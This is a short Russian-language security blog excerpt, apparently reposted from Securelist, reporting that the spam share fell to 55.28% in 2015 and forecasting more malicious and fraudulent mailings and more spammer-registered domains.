Доля спама в 2015 году уменьшилась на 11,48 п.п., до 55,28%. Наибольшее снижение показателя наблюдалось в первом квартале, начиная с апреля он менялся лишь в пределах нескольких процентов. Столь значительное снижение связано с миграцией рекламы легальных товаров и услуг из спам-потоков на более удобные и легальные платформы (социальные сети, купонные сервисы и т.д.), а также увеличением зоны «серых» рассылок (т.е. рассылок, направляемых и добровольным подписчикам, и тем, кто не дал свое согласие на их получение). Можно предположить, что в следующем году доля спама также продолжит уменьшаться, однако снижение вряд ли будет столь заметным.

Количество вредоносных и мошеннических писем, напротив, будет увеличиваться. Возможно, злоумышленники вновь обратятся к старым забытым трюкам, как это было в 2015 году (массовая рассылка макровирусов и нетипичные для спама расширения вложений). Мобильная тема также может стать очередной уловкой в арсенале мошенников для распространения вредоносного и мошеннического спама.

Количество новых доменов, создаваемых спамерами непосредственно под рассылки, продолжит увеличиваться, ожидается и расширение используемых в спамерских ресурсах новых доменных зон.



from Securelist - Всё об интернет-безопасности http://ift.tt/1SOoKXO
via IFTTT